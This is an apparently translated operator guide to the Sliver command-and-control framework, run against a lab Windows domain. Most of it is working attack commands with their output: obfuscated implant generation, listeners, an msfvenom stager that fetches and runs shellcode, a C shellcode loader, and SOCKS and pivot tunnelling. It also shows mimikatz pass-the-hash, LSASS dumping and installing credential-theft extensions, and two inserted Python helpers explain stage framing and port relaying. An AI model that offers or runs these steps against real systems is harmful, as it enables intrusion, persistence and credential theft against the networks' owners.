Sliver

Refer

Setup

Auto install

sudo apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64
curl https://sliver.sh/install|sudo bash

Start the Sliver server

systemctl start sliver
systemctl status sliver

Configure authentication

Connect with client

└─$ sliver                                                                       
Connecting to localhost:31337 ...

.------..------..------..------..------..------.                                                                                                                                                                                            
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |                                                                                                                                                                                            
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |                                                                                                                                                                                            
| :\/: || (__) || :\/: || ()() || :\/: || ()() |                                                                                                                                                                                            
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|                                                                                                                                                                                            
`------'`------'`------'`------'`------'`------'                                                                                                                                                                                            
                                                                                                                                                                                                                                            
All hackers gain dash
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver >  

Beacons and Sessions

In Sliver, the C2 agent is called an implant.

Sliver supports two implant modes: beacons and sessions.

Reference: https://sliver.sh/docs?name=Getting+Started

Sliver implants in v1.5 and later support two modes of operation: "beacon mode" and "session mode." Beacon mode implements an asynchronous communication style where the implant periodically checks in with the server, retrieves tasks, executes them, and returns the results. In "session mode" the implant will create an interactive real time session using either a persistent connection or using long polling depending on the underlying C2 protocol.

Put simply, beacon mode works like a Cobalt Strike beacon (asynchronous check-ins at an interval), while session mode works like a Metasploit/Meterpreter session (interactive, real-time).

Generate session implant

sliver > generate --mtls <C2 server ip> --os windows --arch amd64 --format exe --save /tmp/shell.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 44s
[*] Implant saved to /tmp/shell.exe

Start an mTLS listener

sliver > mtls

[*] Starting mTLS listener ...

[*] Successfully started job #1

sliver > jobs

 ID   Name   Protocol   Port   Stage Profile 
==== ====== ========== ====== ===============
 1    mtls   tcp        8888                 

sliver >  

Interacting with sessions

[*] Session bb86e5a5 DIGITAL_ATTENTION - 192.168.179.11:59818 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 22:59:29 EST

sliver > sessions

 ID         Name                Transport   Remote Address         Hostname           Username                  Operating System   Locale   Last Message                             Health  
========== =================== =========== ====================== ================== ========================= ================== ======== ======================================== =========
 bb86e5a5   DIGITAL_ATTENTION   mtls        192.168.179.11:59818   DomainController   ENDY-COMP\administrator   windows/amd64      en-US    Sat Dec 21 22:59:29 EST 2024 (23s ago)   [ALIVE] 

sliver > use

? Select a session or beacon: SESSION  bb86e5a5  DIGITAL_ATTENTION  192.168.179.11:59818  DomainController  ENDY-COMP\administrator  windows/amd64
[*] Active session DIGITAL_ATTENTION (bb86e5a5-82e0-4562-80db-02dab7f3e0d9)

sliver (DIGITAL_ATTENTION) > info

        Session ID: bb86e5a5-82e0-4562-80db-02dab7f3e0d9
              Name: DIGITAL_ATTENTION
          Hostname: DomainController
              UUID: 6d114d56-3846-0706-4bad-06bcafa25169
          Username: ENDY-COMP\administrator
               UID: S-1-5-21-3689512688-2841538555-566222747-500
               GID: S-1-5-21-3689512688-2841538555-566222747-513
               PID: 5468
                OS: windows
           Version: Server 2016 build 14393 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://192.168.179.132:8888
    Remote Address: 192.168.179.11:59818
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)
      Last Checkin: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)

Background and kill a session

sliver (DIGITAL_ATTENTION) > background

[*] Background ...

sliver > sessions

 ID         Name                Transport   Remote Address         Hostname           Username                  Operating System   Locale   Last Message                              Health  
========== =================== =========== ====================== ================== ========================= ================== ======== ========================================= =========
 75da56b4   DIGITAL_ATTENTION   mtls        192.168.179.11:59853   DomainController   ENDY-COMP\administrator   windows/amd64      en-US    Sat Dec 21 23:03:57 EST 2024 (1m4s ago)   [ALIVE] 

sliver > sessions -k 75da56b4

[!] Lost session 75da56b4 DIGITAL_ATTENTION - 192.168.179.11:59853 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:05:21 EST


sliver >

Generate beacon implant

sliver > generate beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --save /tmp/beacon.exe --seconds 5 --jitter 3

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 29s
[*] Implant saved to /tmp/beacon.exe

Interacting with beacons

[*] Beacon be2fe170 DETERMINED_JUNKET - 192.168.179.11:59885 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:10:34 EST

sliver > beacons

 ID         Name                Tasks   Transport   Remote Address         Hostname           Username                  Operating System   Locale   Last Check-In                           Next Check-In                        
========== =================== ======= =========== ====================== ================== ========================= ================== ======== ======================================= ======================================
 be2fe170   DETERMINED_JUNKET   0/0     mtls        192.168.179.11:59885   DomainController   ENDY-COMP\administrator   windows/amd64      en-US    Sat Dec 21 23:10:47 EST 2024 (3s ago)   Sat Dec 21 23:10:52 EST 2024 (in 2s)                                                                                                                                                                                                      

sliver > use

? Select a session or beacon: BEACON  be2fe170  DETERMINED_JUNKET  192.168.179.11:59885  DomainController  ENDY-COMP\administrator  windows/amd64
[*] Active beacon DETERMINED_JUNKET (be2fe170-f919-47fe-8c3d-9ed9fb54ee99)

sliver (DETERMINED_JUNKET) > info

         Beacon ID: be2fe170-f919-47fe-8c3d-9ed9fb54ee99
              Name: DETERMINED_JUNKET
          Hostname: DomainController
              UUID: 6d114d56-3846-0706-4bad-06bcafa25169
          Username: ENDY-COMP\administrator
               UID: S-1-5-21-3689512688-2841538555-566222747-500
               GID: S-1-5-21-3689512688-2841538555-566222747-513
               PID: 5484
                OS: windows
           Version: Server 2016 build 14393 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://192.168.179.132:8888
    Remote Address: 192.168.179.11:59885
         Proxy URL: 
          Interval: 5s
            Jitter: 3s
     First Contact: Sat Dec 21 23:10:34 EST 2024 (24s ago)
      Last Checkin: Sat Dec 21 23:10:53 EST 2024 (5s ago)
      Next Checkin: Sat Dec 21 23:10:58 EST 2024 (0s ago)

sliver (DETERMINED_JUNKET) > 

Check tasks

sliver (DETERMINED_JUNKET) > tasks

 ID         State       Message Type   Created                         Sent                            Completed                     
========== =========== ============== =============================== =============================== ===============================
 2b2aec2f   completed   Screenshot     Sat, 21 Dec 2024 23:12:08 EST   Sat, 21 Dec 2024 23:12:12 EST   Sat, 21 Dec 2024 23:12:12 EST 
 9ecc207b   completed   Execute        Sat, 21 Dec 2024 23:12:04 EST   Sat, 21 Dec 2024 23:12:06 EST   Sat, 21 Dec 2024 23:12:06 EST 

Reconfigure a beacon (interval and jitter)

sliver (DETERMINED_JUNKET) > reconfig -i 5s -j 1s

[*] Tasked beacon DETERMINED_JUNKET (428cea99)

[+] DETERMINED_JUNKET completed task 428cea99

[*] Reconfigured beacon  

Convert a beacon into a session

sliver (DETERMINED_JUNKET) > interactive 

[*] Using beacon's active C2 endpoint: mtls://192.168.179.132:8888
[*] Tasked beacon DETERMINED_JUNKET (51e7cb02)

[*] Session caee6edb DETERMINED_JUNKET - 192.168.179.11:59967 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:17:21 EST

sliver (DETERMINED_JUNKET) >

The interactive session can also be opened over a different C2 protocol than the beacon is using (see the flags below).

sliver > interactive --help

Task a beacon to open an interactive session (Beacon only)

Usage:
======
  interactive [flags]

Flags:
======
  -d, --delay      string    delay opening the session (after checkin) for a given period of time (default: 0s)
  -n, --dns        string    dns connection strings
  -h, --help                 display help
  -b, --http       string    http(s) connection strings
  -m, --mtls       string    mtls connection strings
  -p, --named-pipe string    namedpipe connection strings
  -i, --tcp-pivot  string    tcppivot connection strings
  -t, --timeout    int       command timeout in seconds (default: 60)
  -g, --wg         string    wg connection strings

  • Beacons can be turned into sessions, but a session cannot be turned back into a beacon.

  • Some commands, such as shell and portfwd, only work with sessions.

Profiles

Create profiles so implants can be generated quickly with the same settings.

Session profile

sliver > profiles new --mtls 192.168.179.132 --os windows --arch amd64 --format exe session_win_default

[*] Saved new implant profile session_win_default

sliver > profiles 

 Profile Name          Implant Type   Platform        Command & Control                 Debug   Format       Obfuscation   Limitations 
===================== ============== =============== ================================= ======= ============ ============= =============
 session_win_default   session        windows/amd64   [1] mtls://192.168.179.132:8888   false   EXECUTABLE   enabled                   

sliver > profiles generate --save /tmp/shell.exe session_win_default

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 24s
[*] Implant saved to /tmp/shell.exe

Beacon profile

sliver > profiles new beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 beacon_win_default

[*] Saved new implant profile (beacon) beacon_win_default

sliver > profiles 

 Profile Name          Implant Type   Platform        Command & Control                 Debug   Format       Obfuscation   Limitations 
===================== ============== =============== ================================= ======= ============ ============= =============
 beacon_win_default    beacon         windows/amd64   [1] mtls://192.168.179.132:8888   false   EXECUTABLE   enabled                   
 session_win_default   session        windows/amd64   [1] mtls://192.168.179.132:8888   false   EXECUTABLE   enabled                   

sliver > profiles generate --save /tmp/beacon.exe beacon_win_default

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 26s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/beacon.exe

List implant builds

sliver > implants 

 Name                Implant Type   Template   OS/Arch             Format   Command & Control                 Debug 
=================== ============== ========== =============== ============ ================================= =======
 DETERMINED_JUNKET   beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 DIGITAL_ATTENTION   session        sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 EASY_BROOM          session        sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 FRESH_AUDIENCE      beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 TALL_POST           beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.122.111:8888   false 

Remove an implant build

sliver > implants rm TALL_POST

? Remove 'TALL_POST' build? Yes

Stager

To create a stager, first create a profile with the shellcode format.

sliver > profiles new --http 192.168.179.132 --format shellcode win-shellcode

[*] Saved new implant profile win-shellcode

Start a listener for the implant itself

sliver > https

[*] Starting HTTPS :443 listener ...

[*] Successfully started job #1

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        443                  

Create a stage-listener for the profile to deliver the shellcode. Remember to add --prepend-size, which prefixes the served shellcode with its length so the stager knows how much to read.

sliver > stage-listener --url http://192.168.179.132:1234 --profile win-shellcode --prepend-size

[*] No builds found for profile win-shellcode, generating a new one
[*] Sliver name for profile win-shellcode: UNNECESSARY_DICTAPHONE
[*] Job 8 (http) started

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile                                       
==== ======= ========== ====== =====================================================
 7    https   tcp        443                                                        
 8    http    tcp        1234   win-shellcode (Sliver name: UNNECESSARY_DICTAPHONE) 

Generate the stager that downloads and runs the staged shellcode with msfvenom. Note that the custom payload type must be used; a meterpreter stager will not work with this stage.

msfvenom --payload windows/x64/custom/reverse_winhttp LHOST=192.168.179.132 LPORT=1234 LURI=/hello.woff --format exe --out /tmp/stager.exe

Alternatively, generate the stager in C format (-f c) and use the following loader to run it.

#include <windows.h>
#include <string.h>

int main(void)
{
    /* Paste the msfvenom -f c output here; the array is truncated on this page */
    unsigned char shellcode[] =
    "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
    "\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
    ...
    "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
    "\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff"
    "\xd5";

    /* Allocate an RWX page, copy the stager in and jump to it */
    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == NULL)
        return 1;
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();

    return 0;
}

Compile

x86_64-w64-mingw32-gcc -o shellrunner.exe shellrunner.c

After running the file, wait 5-10 seconds for the session to come back (sometimes a session arrives without an alert, so run `sessions` to check).
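To see what --prepend-size actually does to the bytes the stage-listener serves, here is an added Python example (it is not part of the original page and not Sliver's code). It assumes the framing is a 4-byte little-endian length followed by the raw shellcode, which is what Sliver's --prepend-size produces; the sample shellcode bytes are constructed, and fetch_stage() is an optional helper for pulling a stage from a live listener such as http://192.168.179.132:1234/hello.woff to check it before touching a target.

```python
import struct
import urllib.request


def prepend_size(payload: bytes) -> bytes:
    """Frame a stage the way the stage-listener does with --prepend-size:
    a 4-byte little-endian length, then the raw shellcode (assumption)."""
    return struct.pack("<I", len(payload)) + payload


def parse_staged(blob: bytes) -> bytes:
    """Inverse of prepend_size(): what a size-aware stager does on receipt.
    Raises ValueError when the header and body disagree, which is the
    symptom of a listener started without --prepend-size or a truncated
    download."""
    if len(blob) < 4:
        raise ValueError("stage too short to carry a size header")
    (size,) = struct.unpack("<I", blob[:4])
    body = blob[4:]
    if size != len(body):
        raise ValueError(f"size header {size} != body length {len(body)}")
    return body


def looks_size_prefixed(blob: bytes) -> bool:
    """Quick check on a downloaded stage: does the header match the body?"""
    try:
        parse_staged(blob)
        return True
    except ValueError:
        return False


def fetch_stage(url: str, timeout: float = 10.0) -> bytes:
    """Fetch a stage from a stage-listener URL so it can be checked with
    looks_size_prefixed() before the stager is run on a target."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


# Constructed sample: a few bytes standing in for a real shellcode blob.
SAMPLE_SHELLCODE = b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"


if __name__ == "__main__":
    framed = prepend_size(SAMPLE_SHELLCODE)
    print("header:", framed[:4].hex())
    print("framed ok:", looks_size_prefixed(framed))
    print("raw ok:", looks_size_prefixed(SAMPLE_SHELLCODE))
```

A raw (unframed) stage almost never passes the check, because the first four shellcode bytes read as a huge length; that mismatch is why the custom stager never calls back when --prepend-size is forgotten.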

Execute Assembly

Sliver can run .NET assemblies in memory, similar to Cobalt Strike's execute-assembly. Arguments after the assembly path are passed to the assembly; the run below passed none, which is why Seatbelt reports an empty command (give it a command or group, e.g. -group=system).

sliver (BROKEN_LIQUID) > execute-assembly /home/kali/tools/Ghostpack-CompiledBinaries/Seatbelt.exe

[*] Output:


                        %&&@@@&&                                                                                  
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%                         
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################                        
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*                         
                        &%%&&&%%%%%        v1.2.1         ,(((&%%%%%%%%%%%%%%%%%,                                 
                         #%%%%##,                                                                                 


ERROR: Error running command ""


[*] Completed collection in 0.006 seconds

Socks and Portfwd

Socks5

sliver (BROKEN_LIQUID) > socks5 --help

In-band SOCKS5 Proxy

Usage:
======
  socks5 [flags]

Flags:
======
  -h, --help           display help
  -t, --timeout int    router timeout in seconds (default: 60)

Sub Commands:
=============
  start  Start an in-band SOCKS5 proxy
  stop   Stop a SOCKS5 proxy
  
sliver (BROKEN_LIQUID) > socks5 start

[*] Started SOCKS5 127.0.0.1 1081  
⚠  In-band SOCKS proxies can be a little unstable depending on protocol

sliver (BROKEN_LIQUID) > socks5 

 ID   Session ID                             Bind Address     Username   Passwords 
==== ====================================== ================ ========== ===========
  1   762b70da-f0db-4d20-ada9-a155f4a1ce7d   127.0.0.1:1081                        

sliver (BROKEN_LIQUID) > socks5 stop -i 1

[*] Removed socks5

sliver (BROKEN_LIQUID) >  

In my experience it is not as stable as Cobalt Strike's.

Portfwd

sliver (SPICY_JAW) > portfwd --help 

In-band TCP port forwarding

Usage:
======
  portfwd [flags]

Flags:
======
  -h, --help           display help
  -t, --timeout int    command timeout in seconds (default: 60)

Sub Commands:
=============
  add  Create a new port forwarding tunnel
  rm   Remove a port forwarding tunnel

sliver (SPICY_JAW) > portfwd add -b 127.0.0.1:9999 -r 192.168.17.138:445

[*] Port forwarding 127.0.0.1:9999 -> 192.168.17.138:445

This binds port 9999 on the operator's machine and tunnels anything that connects to it, through the implant, to port 445 on 192.168.17.138.

Remove the port forward

sliver (SPICY_JAW) > portfwd

 ID   Session ID                             Bind Address     Remote Address     
==== ====================================== ================ ====================
  1   b0653816-faa9-4975-b28b-92165d4a6085   127.0.0.1:9999   192.168.17.138:445 

sliver (SPICY_JAW) > portfwd rm -i 1

[*] Removed portfwd
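To make the bind/remote semantics of portfwd concrete, the following added Python example (not Sliver's code, not from the original page) implements a minimal TCP relay with the same shape: every connection to the bind address is forwarded to the remote address. The echo server is a constructed stand-in for the remote service (the SMB port on 192.168.17.138:445 in the page's command). It assumes loopback sockets are available; unlike Sliver, where the remote leg is opened from the implant, this relay opens both legs on the same host.

```python
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until EOF, then half-close dst so the far end sees EOF."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(bind_host: str, bind_port: int, remote_host: str, remote_port: int):
    """Bind bind_host:bind_port (0 = any free port) and relay each accepted
    connection to remote_host:remote_port. Returns (listener, actual_port)."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind((bind_host, bind_port))
    lsock.listen(5)

    def accept_loop() -> None:
        while True:
            try:
                client, _ = lsock.accept()
            except OSError:
                return  # listener closed by stop_listener()
            try:
                remote = socket.create_connection((remote_host, remote_port), timeout=5)
            except OSError:
                client.close()  # remote unreachable: drop this client, keep listening
                continue
            # One thread per direction, like a bidirectional tunnel.
            threading.Thread(target=_pump, args=(client, remote), daemon=True).start()
            threading.Thread(target=_pump, args=(remote, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return lsock, lsock.getsockname()[1]


def start_echo_server(host: str = "127.0.0.1"):
    """Constructed stand-in for the remote service: echoes whatever it receives."""
    ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ssock.bind((host, 0))
    ssock.listen(5)

    def serve() -> None:
        while True:
            try:
                conn, _ = ssock.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return ssock, ssock.getsockname()[1]


def stop_listener(sock: socket.socket) -> None:
    """Wake a blocked accept() and close the listening socket."""
    try:
        sock.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    sock.close()


def roundtrip(port: int, payload: bytes) -> bytes:
    """Connect to the local bind port, send payload, return what comes back."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            d = c.recv(4096)
            if not d:
                break
            chunks.append(d)
    return b"".join(chunks)


def demo(payload: bytes = b"hello smb") -> bytes:
    """client -> 127.0.0.1:<bind> -> relay -> echo server; returns the echoed bytes."""
    echo_sock, echo_port = start_echo_server()
    fwd_sock, bind_port = start_forwarder("127.0.0.1", 0, "127.0.0.1", echo_port)
    try:
        return roundtrip(bind_port, payload)
    finally:
        stop_listener(fwd_sock)
        stop_listener(echo_sock)


if __name__ == "__main__":
    print(demo())
```

The point to take away is the direction: tools on the operator box talk to 127.0.0.1:<bind port>, and the remote service only ever sees a connection from the host that opens the remote leg (the implant, in Sliver's case).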

Pivot

Pivot listeners can only be started from sessions, not from beacons.

TCP Pivot

Start a TCP pivot listener on the session

sliver (BROKEN_LIQUID) > pivots tcp 

[*] Started tcp pivot listener :9898 with id 1

sliver (BROKEN_LIQUID) > pivots

 ID   Protocol   Bind Address   Number Of Pivots 
==== ========== ============== ==================
  1   TCP        :9898                         0 

sliver (BROKEN_LIQUID) >

Generate an implant that calls back through the pivot

sliver > generate --tcp-pivot 192.168.17.137:9898 --os windows --arch amd64 --format exe --save /tmp/pivot.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 30s
[*] Implant saved to /tmp/pivot.exe

The IP here is the address of the host running the session, which must be reachable from the target.

Upload the file to the target and run it; the new session arrives through the TCP pivot tunnel.

SMB Pivot

Start a named-pipe pivot listener on the session

sliver > use 982155fd

[*] Active session BROKEN_LIQUID (982155fd-407a-434b-8686-e4af57c1f295)

sliver (BROKEN_LIQUID) > pivots named-pipe --bind foobar

[*] Started named pipe pivot listener \\.\pipe\foobar with id 2

Generate an implant that calls back through the named pipe

sliver > generate --named-pipe 192.168.17.137/pipe/foobar --os windows --arch amd64 --format exe --save /tmp/pivot.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 34s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/pivot.exe

As above, the IP is that of the host running the session, reachable from the target.

Result:

Stop pivot

sliver (BROKEN_LIQUID) > pivots stop -i 1

[*] Stopped pivot listener

Operator

Rename sessions

sliver > sessions

 ID         Name               Transport   Remote Address          Hostname   Username                  Operating System   Locale   Last Message                            Health  
========== ================== =========== ======================= ========== ========================= ================== ======== ======================================= =========
 0456ae36   BEAUTIFUL_REPORT   http(s)     192.168.179.137:49870   WinA       ENDY-COMP\administrator   windows/amd64      en-US    Sat Jan  4 22:50:55 EST 2025 (2s ago)   [ALIVE] 

sliver > use 0456ae36

[*] Active session BEAUTIFUL_REPORT (0456ae36-c402-45b7-b111-8f83916b3048)

sliver (BEAUTIFUL_REPORT) > rename -n WinA

[*] Renamed implant to WinA

sliver > sessions 

 ID         Name   Transport   Remote Address          Hostname   Username                  Operating System   Locale   Last Message                            Health  
========== ====== =========== ======================= ========== ========================= ================== ======== ======================================= =========
 0456ae36   WinA   http(s)     192.168.179.137:49870   WinA       ENDY-COMP\administrator   windows/amd64      en-US    Sat Jan  4 23:06:52 EST 2025 (1s ago)   [ALIVE] 

sliver >  

Upload / Download

sliver (WinA) > download desktop.ini /home/kali/test

[*] Wrote 282 bytes (1 file successfully, 0 files unsuccessfully) to /home/kali/test

sliver (WinA) > upload /home/kali/test test

[*] Wrote file to C:\Users\Administrator\Desktop\test

Shell

sliver (BEAUTIFUL_REPORT) > shell 

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 2844

PS C:\Users\Administrator\Desktop> Shell exited

sliver (BEAUTIFUL_REPORT) >  

Press Ctrl+D (EOF) to exit the shell.

Execute with output

sliver (WinA) > execute -o whoami /all

[*] Output:

USER INFORMATION
----------------

User Name          SID                                        
================== ===========================================
wina\administrator S-1-5-21-2122276757-511757396-437061769-500


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                                     
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group             
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288                                                                

Make token

sliver (WinA) > ls \\\\192.168.17.138\\Share

\\192.168.17.138\ (0 items, 0 B)
================================


sliver (WinA) > make-token -u userB -p Password123 -d .


[*] Successfully impersonated .\userB. Use `rev2self` to revert to your previous token.
sliver (WinA) > ls \\\\192.168.17.138\\Share

\\192.168.17.138\Share\ (1 item, 0 B)
=====================================
-rw-rw-rw-  123.txt  0 B  Sat Jan 04 21:48:13 -0800 2025


sliver (WinA) >

Use rev2self to drop the impersonated token.

Pass the hash

sliver (LOVELY_STAR) > upload /home/kali/tools/mimikatz/x64/mimikatz.exe mimikatz.exe

[*] Wrote file to C:\Users\Administrator\Desktop\mimikatz.exe

sliver (LOVELY_STAR) > execute -o mimikatz.exe "privilege::debug" "sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:\"powershell -w hidden\"" "exit"

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:"powershell -w hidden"
user    : userB
domain  : .
program : powershell -w hidden
impers. : no
NTLM    : 58a478135a93ac3bf058a5ea0e8fdb71
  |  PID  3048
  |  TID  1900
  |  LSA Process is now R/W
  |  LUID 0 ; 2745069 (00000000:0029e2ed)
  \_ msv1_0   - data copy @ 000001E1308E1CF0 : OK !
  \_ kerberos - data copy @ 000001E12FD0DB98
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001E12FD3A208 (32) -> null

mimikatz(commandline) # exit
Bye!

Dump process

sliver (WinA) > procdump --pid 672 --save lsass.dmp

[*] Process dump stored in: lsass.dmp

Parse the minidump offline with pypykatz

┌──(kali㉿kali)-[~]
└─$ pypykatz lsa minidump lsass.dmp
INFO:pypykatz:Parsing file lsass.dmp
FILE: ======== lsass.dmp =======
== LogonSession ==
authentication_id 113459 (1bb33)
session_id 0
username ANONYMOUS LOGON
domainname NT AUTHORITY
logon_server 
logon_time 2025-01-05T07:49:38.007112+00:00
sid S-1-5-7
luid 113459
....

Side load

sliver (WinA) > sideload /home/kali/tools/mimikatz/x64/mimikatz.exe "privilege::debug" "exit"

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # exit
Bye!

Armory

Armory is Sliver's extension package manager; it lets you download additional packages (aliases and extensions) into the client.

sliver > armory

Install package

sliver > armory install windows-credentials

[*] Installing extension 'coff-loader' (v1.0.14) ... done!
[*] Installing extension 'nanodump' (v0.0.5) ... done!
[*] Installing extension 'credman' (v1.0.7) ... done!
[*] Installing extension 'chromiumkeydump' (v0.0.2) ... done!
[*] Installing extension 'handlekatz' (v0.0.1) ... done!
[*] Installing extension 'mimikatz' (v0.0.1) ... done!
